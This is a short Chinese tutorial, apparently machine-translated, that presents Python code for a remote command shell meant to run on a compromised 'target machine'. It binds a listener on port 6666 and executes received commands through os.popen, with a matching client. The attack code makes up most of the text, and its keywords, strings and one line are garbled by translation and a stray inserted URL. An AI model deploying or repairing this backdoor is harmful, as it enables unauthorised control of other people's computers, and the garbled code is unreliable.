python模拟菜刀反弹外壳绕过限制【推荐】

  

有的时候我们在获取到目标电脑时候如果对方电脑又python编译环境时可以利用python反弹外壳

  

主要用操作系统到python库和sokect库

  

这里的服务端在目标机上运行

        从套接字进口*   从操作系统导入*   s=插座(AF_INET SOCK_STREAM) # IVP4寻址tcp协议   s.bind(", 6666) #补丁端口   s.listen(1) #开始监听一个队列   而真正的:   袜子,addr=s.accept() #返回两次第一次返回连接地址二端口号   打印(“客户端:“,addr)   而真正的:   cmd=sock.recv(1024) #缓存长度接收传递过来   cmdstr=cmd.decode ()   如果cmdstr==巴顺觥?   打印(“客户端:“,addr,“关闭”)   sock.close ()   打破   结果=popen (cmdstr) .read ()   sock.send (result.encode ())   s.close ()      

本机运行
  

        从套接字进口*   从操作系统导入*      c=插座(AF_INET SOCK_STREAM) # IVP4寻址tcp协议   c.connect((127.0.0.1, 6666)) #连接地址   而真正的:   cmd=输入(cmd:)   c.send (cmd.encode()) #必须传递流   如果cmd==巴顺觥?   c.close ()   打破   data=https://www.yisu.com/zixun/c.recv (1014)   print (data.decode ())      

  

以上所述是小编给大家介绍的python模拟菜刀反弹外壳绕过限制,希望对大家有所帮助,如果大家有任何疑问欢迎给我留的言,小编会及时回复大家的!

python模拟菜刀反弹外壳绕过限制【推荐】